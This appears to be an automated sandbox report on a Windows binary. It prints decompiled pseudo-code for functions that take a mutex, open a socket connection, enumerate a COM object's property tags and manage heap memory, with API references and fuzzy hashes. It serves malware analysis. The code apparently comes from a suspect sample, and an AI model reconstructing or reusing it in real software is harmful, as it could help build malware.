    • API ID: CloseCreateFreeFromHandleHeapMutexObjectOpenSingleStringWait
    • String ID: pB
    • API String ID: 260957474-3059159000
    • Opcode ID: 47bea97d8c28ff44688e19799dcfadacc82ffd6d7bf2d5edf17c678bca3d59a3
    • Instruction ID: 21e8035d942d172505ad67d78d4bb8485723199f702f5b4a63f2e89fc14ac132
    • Opcode Fuzzy Hash: 47bea97d8c28ff44688e19799dcfadacc82ffd6d7bf2d5edf17c678bca3d59a3
    • Instruction Fuzzy Hash: 5801493160122063E332E719EC45FDB33D45B54314FD0422BF454AA2E0DA3C5696C69F
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E0041CDD0(void* __eflags, void* _a4, intOrPtr _a8) {
    				char _v672;
    				char _v800;
    				char _v904;
    				short _v916;
    				long _t15;
    				void* _t22;
    
    				E0041D150( &_v800);
    				E00416E10(0x42eb70,  &_v672,  *0x42e904,  &_v904, _a8);
    				_t22 = CreateMutexW(0x42e930, 0,  &_v916);
    				if(_t22 == 0) {
    					L4:
    					return 0;
    				} else {
    					_t15 = WaitForSingleObject(_t22, 0xffffffff);
    					if(_t15 == 0 || _t15 == 0x80) {
    						return _t22;
    					} else {
    						CloseHandle(_t22);
    						goto L4;
    					}
    				}
    			}

    APIs
      • Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6
    • CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,?,?), ref: 0041CE18
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041CE27
    • CloseHandle.KERNEL32(00000000), ref: 0041CE39
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseCreateFromHandleMutexObjectSingleStringWait
    • String ID: pB
    • API String ID: 3863295650-3059159000
    • Opcode ID: e5434edec459e2940484f313f1b045bd986653ee5b324b5188600413a5360b0a
    • Instruction ID: b09c9a47bd34e6ffa131b8f877b81c4577cb0a42370e09d22c8bb7e0dfb5de22
    • Opcode Fuzzy Hash: e5434edec459e2940484f313f1b045bd986653ee5b324b5188600413a5360b0a
    • Instruction Fuzzy Hash: A3F0C8752043115BD371E758ED84FEB779CAF94310F448A2EF899D2390EE389A4487AA
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(0000007F,00000001,00000006), ref: 00414D29
    • connect.WS2_32(00000000,?,-0000001D), ref: 00414D49
    • closesocket.WS2_32(00000000), ref: 00414D54
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: closesocketconnectsocket
    • String ID: p0u
    • API String ID: 643388700-1742372003
    • Opcode ID: 40ef66999ff3c06ef88b84812362ce9e9ec01de5546ac9c5b6e2781f10787dc0
    • Instruction ID: 811b71dd85b763547402c5ab072f2fd0249334b37263b574dd705cbfcb3263ea
    • Opcode Fuzzy Hash: 40ef66999ff3c06ef88b84812362ce9e9ec01de5546ac9c5b6e2781f10787dc0
    • Instruction Fuzzy Hash: 6DE0123161153166D6242B39BD0AAEF2654DB81771B180359F533E91E1E768889185A4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E004082D0(void* __edx, signed char* _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed char* _a20) {
    				long _v0;
    				char _v4;
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v20;
    				void* __ebx;
    				void* __esi;
    				signed char _t47;
    				signed int _t51;
    				void* _t66;
    				signed char _t71;
    				signed char* _t73;
    				intOrPtr _t75;
    				signed char _t76;
    				intOrPtr _t78;
    				intOrPtr _t97;
    				long _t99;
    				signed char _t100;
    				signed char _t102;
    				signed int _t103;
    				signed int _t104;
    				void* _t106;
    				void* _t107;
    
    				_t73 = _a4;
    				_t47 = _t73[8];
    				_t76 =  *_t73;
    				_t102 = __edx - _t47;
    				if((_t76 & 0x00000004) == 0) {
    					if((_t76 & 0x00000002) == 0) {
    						if((_t76 & 0x00000001) == 0) {
    							L38:
    							return 1;
    						} else {
    							if(_a12 == 0) {
    								goto L2;
    							} else {
    								_t51 = E00410840(_t102, _t47 + _a8);
    								 *_a12 = _t51;
    								if(_t51 == 0) {
    									goto L8;
    								} else {
    									 *_a20 = _t102;
    									_t73[0xc] = _t73[8] + _t102;
    									goto L38;
    								}
    							}
    						}
    					} else {
    						_t78 = _a8;
    						_t97 = _t78 + __edx;
    						_t107 = 0;
    						_t103 = _t47 + _t78;
    						_v8 = _t97;
    						_a12 = 0;
    						if(_t103 == _t97) {
    							L29:
    							_t104 = 0;
    							goto L30;
    						} else {
    							while(1) {
    								_t98 = _t97 - _t103;
    								if(E00410890(_t103, _t97 - _t103, "\r\n", 2) == 0 && E00410890(_t103, _t98, "\n", 1) == 0) {
    									goto L29;
    								}
    								_t103 = E00417D20(_t103,  &_v12, _t98,  &_v4);
    								if(_t103 == 0) {
    									L28:
    									_t104 = _t103 | 0xffffffff;
    									L30:
    									if(_t107 != 0) {
    										HeapFree( *0x42e6d4, 0, _t107);
    									}
    									return _t104;
    								} else {
    									if(_v12 == 0) {
    										goto L29;
    									} else {
    										_t75 = _v4;
    										if(_t75 == 0) {
    											 *_a16 = _t107;
    											_a4[0xc] = _t103 - _a8;
    											 *_a20 = _a12;
    											return 1;
    										} else {
    											_t99 = _t75 + _a12;
    											if(_t99 != 0) {
    												_t27 = _t99 + 4; // 0x4
    												if(_t107 != 0) {
    													_t66 = HeapReAlloc( *0x42e6d4, 8, _t107, ??);
    												} else {
    													_t66 = HeapAlloc( *0x42e6d4, 8, ??);
    												}
    												if(_t66 == 0) {
    													goto L28;
    												} else {
    													_t107 = _t66;
    													goto L26;
    												}
    											} else {
    												if(_t107 != 0) {
    													HeapFree( *0x42e6d4, _t99, _t107);
    												}
    												_t107 = 0;
    												L26:
    												E00410820(_a12 + _t107, _v12, _t75);
    												_v0 = _t99;
    												if(_t103 == _v20) {
    													goto L29;
    												} else {
    													_t97 = _v8;
    													continue;
    												}
    											}
    										}
    									}
    								}
    								goto L39;
    							}
    							goto L29;
    						}
    					}
    				} else {
    					_t100 = _t73[4];
    					if(_t102 >= _t100) {
    						_t106 = _t47 + _a8;
    						if(_t100 != 0) {
    							_t51 = HeapAlloc( *0x42e6d4, 0, _t100 + 4);
    							if(_t51 != 0) {
    								_t51 = E00410820(_t51, _t106, _t100);
    							}
    						} else {
    							_t51 = 0;
    						}
    						 *_a16 = _t51;
    						if(_t51 != 0) {
    							_t71 = _t73[4];
    							 *_a20 = _t71;
    							_t73[0xc] = _t73[8] + _t71;
    							return 1;
    						} else {
    							L8:
    							return _t51 | 0xffffffff;
    						}
    					} else {
    						L2:
    						return 0;
    					}
    				}
    				L39:
    			}

    APIs
    • HeapFree.KERNEL32(?,0040170C,00000000,00000000,0040170C,0040170C,00401710,00000001,0040170C,0040170C,0040170C,00000002,?,00000000,0040170C), ref: 004083FA
    • HeapAlloc.KERNEL32(?,00000008,00000004,0040170C,?,00000000,0040170C,00000002), ref: 00408415
    • HeapFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,?,?,?), ref: 0040846B
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Free$Alloc
    • String ID:
    • API String ID: 3901518246-0
    • Opcode ID: b723e2d73e587895986796b93e8f3fd342f11eb6472c05b44a337394c8ee01f3
    • Instruction ID: 25cb61b662c1f0074a50a3d1505533385f21abfcb16a16ac66e99946e2a97e43
    • Opcode Fuzzy Hash: b723e2d73e587895986796b93e8f3fd342f11eb6472c05b44a337394c8ee01f3
    • Instruction Fuzzy Hash: 0151D3322043058BC710DF59E980B67B7A4EBC4B54F04453EFD84AB391DB79E946CBA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040E660(intOrPtr* __ecx, intOrPtr* _a4) {
    				char _v656;
    				void* _v660;
    				intOrPtr _v664;
    				long _v668;
    				void* _v672;
    				intOrPtr _v676;
    				long _v680;
    				void* __esi;
    				signed int _t41;
    				void* _t44;
    				intOrPtr _t47;
    				signed int _t48;
    				void* _t50;
    				void* _t63;
    				void* _t64;
    				intOrPtr _t68;
    				long _t70;
    				void* _t77;
    				long _t84;
    				signed int _t87;
    				long _t90;
    				long _t92;
    				WCHAR* _t93;
    				long _t96;
    
    				_t41 = 0;
    				_v680 = 0;
    				if(__ecx != 0 &&  *__ecx != 0) {
    					do {
    						_t41 = _t41 + 1;
    					} while ( *((short*)(__ecx + _t41 * 2)) != 0);
    				}
    				_t84 = E00411600(_t41,  &_v672);
    				_v672 = _t84;
    				if(_t84 != 0xffffffff) {
    					if(_t84 == 0) {
    						L33:
    						_t77 = _v672;
    					} else {
    						_t77 = _v672;
    						_t47 = 0;
    						_v676 = 1;
    						_v664 = 0;
    						do {
    							if( *((intOrPtr*)(_t47 + _t77)) == 0) {
    								goto L30;
    							} else {
    								_t70 =  *((intOrPtr*)(_t47 + _t77));
    								if( *_t70 == 0) {
    									goto L30;
    								} else {
    									_t48 = 0;
    									if(_t70 != 0 &&  *_t70 != 0) {
    										do {
    											_t48 = _t48 + 1;
    										} while ( *((short*)(_t70 + _t48 * 2)) != 0);
    									}
    									_t96 = E004117A0(_t48, _t70,  &_v660);
    									if(_t96 == 0xffffffff) {
    										_v680 = 0xc5;
    										goto L33;
    									} else {
    										_t64 = _v660;
    										if(_t96 != 0) {
    											_t87 = 0;
    											while(1) {
    												_t93 =  &_v656;
    												E00424100( *((intOrPtr*)(0x403198 + _t87 * 8)), _t93);
    												if(lstrcmpiW( *_t64, _t93) == 0) {
    													break;
    												}
    												_t87 = _t87 + 1;
    												if(_t87 < 0x19) {
    													continue;
    												} else {
    												}
    												L20:
    												_t84 = _v668;
    												if(_t87 == 0x19) {
    													_v680 = 0xca;
    													 *_a4 = _v676;
    												}
    												goto L22;
    											}
    											if( *((intOrPtr*)( *((intOrPtr*)(0x40319c + _t87 * 8))))() == 0) {
    												_v680 = 0xc9;
    												 *_a4 = _v676;
    											}
    											goto L20;
    										}
    										L22:
    										_t92 = _t96;
    										if(_t64 != 0 && _t96 != 0) {
    											do {
    												_t50 =  *(_t64 + _t92 * 4 - 4);
    												_t92 = _t92 - 1;
    												if(_t50 != 0) {
    													HeapFree( *0x42e6d4, 0, _t50);
    												}
    											} while (_t92 != 0);
    											HeapFree( *0x42e6d4, _t92, _t64);
    										}
    										if(_v680 != 0) {
    											goto L33;
    										} else {
    											_t77 = _v672;
    											_t47 = _v664;
    											goto L30;
    										}
    									}
    								}
    							}
    							goto L34;
    							L30:
    							_t68 = _v676 + 1;
    							_v676 = _t68;
    							_t47 = _t47 + 4;
    							_v664 = _t47;
    						} while (_t68 - 1 < _t84);
    					}
    					L34:
    					_t90 = _t84;
    					if(_t77 != 0 && _t84 != 0) {
    						_t63 = _t77;
    						do {
    							_t44 =  *(_t63 + _t90 * 4 - 4);
    							_t90 = _t90 - 1;
    							if(_t44 != 0) {
    								HeapFree( *0x42e6d4, 0, _t44);
    							}
    						} while (_t90 != 0);
    						if(_t63 != 0) {
    							HeapFree( *0x42e6d4, _t90, _t63);
    						}
    					}
    					return _v680;
    				} else {
    					return 0xc5;
    				}
    			}

    APIs
    • lstrcmpiW.KERNEL32(?,?,?), ref: 0040E727
    • HeapFree.KERNEL32(?,00000000,?,?), ref: 0040E79A
    • HeapFree.KERNEL32(?,-00000001,?,?), ref: 0040E7AC
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FreeHeap$lstrcmpi
    • String ID:
    • API String ID: 3326462632-0
    • Opcode ID: 15dc93a65391c69ef824de6cfa5b8aac3f12796ca47a33f55102dfe0b85f9a1f
    • Instruction ID: 3f5485790c647a7a25097ddec1ed5246a78e667151a93702dfec6935f19d51d0
    • Opcode Fuzzy Hash: 15dc93a65391c69ef824de6cfa5b8aac3f12796ca47a33f55102dfe0b85f9a1f
    • Instruction Fuzzy Hash: A351DF756043018BD724EF26E944A2B73A5EBD4304F504E3EE890AB3E0DB79DC56C79A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040FD49(int __eax, void* __ecx, void* __edi, char _a8, char _a426, char _a446, char _a456, char _a466, char _a476) {
    				int _t35;
    				signed int _t36;
    				int _t37;
    				signed int _t38;
    				int _t39;
    				signed int _t40;
    				int _t41;
    				signed int _t42;
    				int _t43;
    				signed int _t44;
    				void* _t58;
    				short* _t59;
    				short* _t60;
    				short* _t61;
    				short* _t62;
    				short* _t63;
    				void* _t66;
    
    				_t58 = __edi;
    				_t35 = __eax;
    				do {
    					_t35 = _t35 + 1;
    				} while ( *((intOrPtr*)(_t66 + _t35 + 0x1aa)) != __ecx);
    				_t36 = MultiByteToWideChar(0, 0,  &_a426, _t35, _t59, 0x104);
    				if(_t36 >= 0x104) {
    					_t36 = 0;
    				}
    				_t59[_t36] = 0;
    				_t37 = 0;
    				_t60 = _t58 + 0x5e0;
    				if(_a446 != 0) {
    					do {
    						_t37 = _t37 + 1;
    					} while ( *((intOrPtr*)(_t66 + _t37 + 0x1be)) != 0);
    				}
    				_t38 = MultiByteToWideChar(0, 0,  &_a446, _t37, _t60, 0x104);
    				if(_t38 >= 0x104) {
    					_t38 = 0;
    				}
    				_t60[_t38] = 0;
    				_t39 = 0;
    				_t61 = _t58 + 0x7e8;
    				if(_a456 != 0) {
    					do {
    						_t39 = _t39 + 1;
    					} while ( *((intOrPtr*)(_t66 + _t39 + 0x1c8)) != 0);
    				}
    				_t40 = MultiByteToWideChar(0, 0,  &_a456, _t39, _t61, 0xa);
    				if(_t40 >= 0xa) {
    					_t40 = 0;
    				}
    				_t61[_t40] = 0;
    				_t41 = 0;
    				_t62 = _t58 + 0x9f0;
    				if(_a466 != 0) {
    					do {
    						_t41 = _t41 + 1;
    					} while ( *((intOrPtr*)(_t66 + _t41 + 0x1d2)) != 0);
    				}
    				_t42 = MultiByteToWideChar(0, 0,  &_a466, _t41, _t62, 0xa);
    				if(_t42 >= 0xa) {
    					_t42 = 0;
    				}
    				_t62[_t42] = 0;
    				_t43 = 0;
    				_t63 = _t58 + 0xbf8;
    				if(_a476 != 0) {
    					do {
    						_t43 = _t43 + 1;
    					} while ( *((intOrPtr*)(_t66 + _t43 + 0x1dc)) != 0);
    				}
    				_t44 = MultiByteToWideChar(0, 0,  &_a476, _t43, _t63, 0xa);
    				if(_t44 >= 0xa) {
    					_t44 = 0;
    				}
    				_t63[_t44] = 0;
    				return E00410870(_t44,  &_a8, 0, 0x1e6);
    			}

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000104,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FD6D
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000104,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FDAD
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,0000000A,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FDEA
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,0000000A,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FE2A
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,0000000A,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FE6A
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: ByteCharMultiWide
    • String ID:
    • API String ID: 626452242-0
    • Opcode ID: 5af15b4eeee7456e3b976f572898f0f1354b044f17e90bcee156acfcc0eae465
    • Instruction ID: 2d295aa477f3407619f161b140afc71f17e2f3b83b99d9987b7ebe1e66ae18b4
    • Opcode Fuzzy Hash: 5af15b4eeee7456e3b976f572898f0f1354b044f17e90bcee156acfcc0eae465
    • Instruction Fuzzy Hash: DD3135726493803AE335D7308C45FEBB6A5EF81704F004D3EE68BEB0D2DA756158839A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00407480(signed int __eax) {
    				void* __esi;
    				void* _t18;
    				void* _t21;
    				void* _t22;
    				signed int _t31;
    				signed int _t33;
    				long _t41;
    				void* _t42;
    				long _t45;
    				long* _t49;
    				void* _t50;
    
    				_t41 =  *0x42d3e0; // 0x0
    				_t31 = __eax * 8 - __eax;
    				_t18 =  *(_t41 + 4 + _t31 * 8);
    				_t49 = _t41 + _t31 * 8;
    				 *_t49 = 0;
    				if(_t18 != 0) {
    					HeapFree( *0x42e6d4, 0, _t18);
    				}
    				E00425CF0(_t49[4], _t49[3]);
    				_t21 = _t49[5];
    				if(_t21 != 0) {
    					HeapFree( *0x42e6d4, 0, _t21);
    				}
    				_t22 = _t49[7];
    				if(_t22 != 0) {
    					_t22 = HeapFree( *0x42e6d4, 0, _t22);
    				}
    				_t50 = _t49[0xb];
    				if(_t50 != 0) {
    					_t22 = HeapFree( *0x42e6d4, 0, _t50);
    				}
    				_t33 =  *0x42d3e4; // 0x0
    				_t45 = _t33;
    				if(_t33 == 0) {
    					L18:
    					return _t22;
    				} else {
    					_t42 =  *0x42d3e0; // 0x0
    					_t14 = (_t33 * 8 - _t33) * 8; // -56
    					_t22 = _t42 + _t14 - 0x38;
    					while( *_t22 == 0) {
    						_t22 = _t22 - 0x38;
    						_t45 = _t45 - 1;
    						if(_t45 != 0) {
    							continue;
    						}
    						break;
    					}
    					if(_t45 == _t33) {
    						goto L18;
    					} else {
    						if(_t45 != 0) {
    							_t22 = E00410740(_t45 * 8 - _t45 + _t45 * 8 - _t45 + _t45 * 8 - _t45 + _t45 * 8 - _t45 + _t45 * 8 - _t45 + _t45 * 8 - _t45 + _t45 * 8 - _t45 + _t45 * 8 - _t45, 0x42d3e0);
    							 *0x42d3e4 = _t45;
    							goto L18;
    						} else {
    							if(_t42 != 0) {
    								_t22 = HeapFree( *0x42e6d4, _t45, _t42);
    							}
    							 *0x42d3e4 = _t45;
    							 *0x42d3e0 = 0;
    							return _t22;
    						}
    					}
    				}
    			}

    APIs
    • HeapFree.KERNEL32(?,00000000,?,00000000,00000000,?,00408CC2), ref: 004074B2
      • Part of subcall function 00410740: HeapFree.KERNEL32(?,?,?,0041895B,00000000,00000000,00000000,00000000,0040C6FF,-00002720,00020000,00000000,00000000,?,00000001), ref: 00410752
    • HeapFree.KERNEL32(?,00000000,?,?,00000000,00000000,?,00408CC2), ref: 004074D1
    • HeapFree.KERNEL32(?,00000000,?,?,00000000,00000000,?,00408CC2), ref: 004074E3
    • HeapFree.KERNEL32(?,00000000,?,?,00000000,00000000,?,00408CC2), ref: 004074F6
    • HeapFree.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00408CC2), ref: 00407537
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FreeHeap
    • String ID:
    • API String ID: 3298025750-0
    • Opcode ID: a1cd3b4bedb8b468622d6cf0a6763ae85d33e24ee051c9446752930e20c9a590
    • Instruction ID: 3592bf938872c9af8d0e03172393671a629e689cff210ae06a016504bd63b1be
    • Opcode Fuzzy Hash: a1cd3b4bedb8b468622d6cf0a6763ae85d33e24ee051c9446752930e20c9a590
    • Instruction Fuzzy Hash: 8D216D71B00201ABD738CB6AED90BA773A8EB98350F94043EA901D7690D738FC01CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00425C80(void* __eax) {
    				void* _t7;
    				void* _t8;
    				void* _t9;
    				void* _t10;
    				void* _t22;
    				void* _t23;
    
    				_t22 = __eax;
    				_t7 =  *(__eax + 4);
    				if(_t7 != 0) {
    					HeapFree( *0x42e6d4, 0, _t7);
    				}
    				_t8 =  *(_t22 + 8);
    				if(_t8 != 0) {
    					HeapFree( *0x42e6d4, 0, _t8);
    				}
    				_t9 =  *(_t22 + 0xc);
    				if(_t9 != 0) {
    					HeapFree( *0x42e6d4, 0, _t9);
    				}
    				_t10 =  *(_t22 + 0x10);
    				if(_t10 != 0) {
    					_t10 = HeapFree( *0x42e6d4, 0, _t10);
    				}
    				_t23 =  *(_t22 + 0x14);
    				if(_t23 != 0) {
    					_t10 = HeapFree( *0x42e6d4, 0, _t23);
    				}
    				return _t10;
    			}

    APIs
    • HeapFree.KERNEL32(?,00000000,00000021,00000000,00000000,00424BC4), ref: 00425C9A
    • HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00424BC4), ref: 00425CAD
    • HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00424BC4), ref: 00425CC0
    • HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00424BC4), ref: 00425CD2
    • HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00424BC4), ref: 00425CE5
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FreeHeap
    • String ID:
    • API String ID: 3298025750-0
    • Opcode ID: a2465c687e62335ff4e3242f452fac64357459c7a13bb4304ebb16d6eee88e0b
    • Instruction ID: fdbfe7ee017768bb1aec2f4cc02d2d9b1e8a9a78cc12e3c31a78c3abe8f259cb
    • Opcode Fuzzy Hash: a2465c687e62335ff4e3242f452fac64357459c7a13bb4304ebb16d6eee88e0b
    • Instruction Fuzzy Hash: E401BB713007106BD634DB6BED40F17B3ECAFA4B10F954529B645D7690D674FC018B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 66%
    			E0041F7C0() {
    				char _v696;
    				char _v976;
    				char _v992;
    				char _v1248;
    				char _v1264;
    				void* _v1280;
    				intOrPtr* _v1296;
    				intOrPtr* _v1300;
    				signed int _v1312;
    				char _v1316;
    				char _v1328;
    				intOrPtr* _v1336;
    				char _v1340;
    				intOrPtr* _v1348;
    				char _v1352;
    				intOrPtr* _v1356;
    				char _v1360;
    				char _v1364;
    				intOrPtr* _v1372;
    				signed int _v1380;
    				void* _v1384;
    				intOrPtr _v1388;
    				void* __esi;
    				intOrPtr* _t59;
    				intOrPtr* _t69;
    				intOrPtr* _t72;
    				intOrPtr* _t74;
    				void* _t76;
    				intOrPtr* _t77;
    				intOrPtr* _t79;
    				intOrPtr* _t82;
    				intOrPtr* _t86;
    				signed int _t91;
    				void* _t93;
    				void* _t108;
    				void* _t121;
    				void* _t138;
    				void* _t145;
    				intOrPtr* _t146;
    				void* _t151;
    				void* _t152;
    				void* _t156;
    				void* _t157;
    
    				_t157 =  &_v1300;
    				_t59 =  &_v1280;
    				_t108 = 0;
    				_v1280 = 0;
    				__imp__CoCreateInstance(0x4038f4, 0, 0x4401, 0x403904, _t59);
    				if(_t59 == 0) {
    					_t59 = _v1300;
    					if(_t59 != 0) {
    						_push(1);
    						_push(0);
    						_t146 = _t59;
    						_push(_t59);
    						_v1296 = _t146;
    						_v1312 = 0;
    						if( *((intOrPtr*)( *((intOrPtr*)( *_t59 + 0x40))))() == 0) {
    							_push( &_v1316);
    							_push(0xe);
    							_push(_t146);
    							if( *((intOrPtr*)( *((intOrPtr*)( *_t146 + 0x14))))() == 0) {
    								_t69 = _v1328;
    								_push( &_v1340);
    								_push(_t69);
    								if( *((intOrPtr*)( *((intOrPtr*)( *_t69 + 0x14))))() == 0) {
    									do {
    										_t74 = _v1348;
    										_t76 =  *((intOrPtr*)( *((intOrPtr*)( *_t74 + 0x38))))(_t74,  &_v1340);
    										if(_t76 == 0 && _v1348 != _t76) {
    											_t82 = _v1356;
    											_push(0x100);
    											_push( &_v976);
    											_push(0x123503f0);
    											_push(_t82);
    											if( *((intOrPtr*)( *((intOrPtr*)( *_t82 + 0x14))))() == 0) {
    												_t145 = E00410AA0( &_v992, 0, 0xffffffff);
    											} else {
    												_t145 = 0;
    											}
    											_t86 = _v1372;
    											_push(0x100);
    											_push( &_v1248);
    											_push(0x143203f0);
    											_push(_t86);
    											if( *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0x14))))() == 0) {
    												_t156 = E00410AA0( &_v1264, 0, 0xffffffff);
    											} else {
    												_t156 = 0;
    											}
    											E00424100(0x4a,  &_v1328);
    											_t151 = 0x4032e8;
    											if(_t156 != 0) {
    												_t151 = _t156;
    											}
    											_t138 = 0x4032e8;
    											if(_t145 != 0) {
    												_t138 = _t145;
    											}
    											if(_t108 == 0) {
    												L19:
    												_t121 = 0x4032e8;
    											} else {
    												_t121 = 0x403964;
    												if( *_t108 == 0) {
    													goto L19;
    												}
    											}
    											_t91 = 0;
    											if(_t108 != 0 &&  *_t108 != 0) {
    												do {
    													_t91 = _t91 + 1;
    													_t173 =  *((short*)(_t108 + _t91 * 2));
    												} while ( *((short*)(_t108 + _t91 * 2)) != 0);
    											}
    											_push(_t151);
    											_push(_t138);
    											_push(_t121);
    											_push( &_v1328);
    											_push(_t91);
    											_t93 = E00411E10( &_v1384, _t173);
    											_t157 = _t157 + 0x14;
    											_t152 = _t93;
    											if(_t145 != 0) {
    												HeapFree( *0x42e6d4, 0, _t145);
    											}
    											if(_t156 != 0) {
    												HeapFree( *0x42e6d4, 0, _t156);
    											}
    											if(_t152 == 0xffffffff) {
    												_v1380 = 0;
    											}
    											if((_v1380 & 0x00000002) != 0) {
    												E00424100(0x53,  &_v1364);
    												E0041F5E0(_v1388, 0x129803f0,  &_v1364, 0x129d03e9, 0x129e03f5, 0x129903f0, 0x129a03f6,  &_v1384);
    											}
    											if((_v1380 & 0x00000004) != 0) {
    												E00424100(0x52,  &_v1352);
    												E0041F5E0(_v1388, 0x13c403f0,  &_v1352, 0x13c903e9, 0x13ca03f5, 0x13c503f0, 0x13c603f6,  &_v1384);
    											}
    											if((_v1380 & 0x00000008) != 0) {
    												E00424100(0x51,  &_v1340);
    												E0041F5E0(_v1388, 0x142803f0,  &_v1340, 0x142d03e9, 0x142e03f5, 0x142903f0, 0x142a03f6,  &_v1384);
    											}
    											_t108 = _v1384;
    										}
    										_t77 = _v1356;
    										 *((intOrPtr*)( *((intOrPtr*)( *_t77 + 8))))(_t77);
    										_t79 = _v1348;
    										_push( &_v1360);
    										_push(_t79);
    									} while ( *((intOrPtr*)( *((intOrPtr*)( *_t79 + 0x14))))() == 0);
    									_t146 = _v1348;
    								}
    								_t72 = _v1336;
    								 *((intOrPtr*)( *((intOrPtr*)( *_t72 + 8))))(_t72);
    							}
    						}
    						_t59 =  *((intOrPtr*)( *((intOrPtr*)( *_t146 + 8))))(_t146);
    						if(_t108 != 0) {
    							if( *_t108 != 0) {
    								E00424100(0x3e,  &_v696);
    								E0040D880(_t108, 0xcc,  &_v696);
    							}
    							return HeapFree( *0x42e6d4, 0, _t108);
    						}
    					}
    				}
    				return _t59;
    			}

    APIs
    • CoCreateInstance.OLE32(004038F4,00000000,00004401,00403904,?,?,00000000,?,00000001), ref: 0041F7E5
    • HeapFree.KERNEL32(?,00000000,00000000,000000FF,?,00000000,?,00000001), ref: 0041F94F
    • HeapFree.KERNEL32(?,00000000,00000000,000000FF,?,00000000,?,00000001), ref: 0041F962
      • Part of subcall function 00410AA0: MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,0040700E,0000FDE9,?), ref: 00410AE4
      • Part of subcall function 00410AA0: HeapAlloc.KERNEL32(?,00000008,-00000004,?,?,0040700E,0000FDE9,?), ref: 00410B05
      • Part of subcall function 00410AA0: MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000001,?,?,0040700E,0000FDE9,?), ref: 00410B34
      • Part of subcall function 0041F5E0: HeapFree.KERNEL32(?,00000000,00000000), ref: 0041F783
      • Part of subcall function 0041F5E0: HeapFree.KERNEL32(?,00000000,?), ref: 0041F796
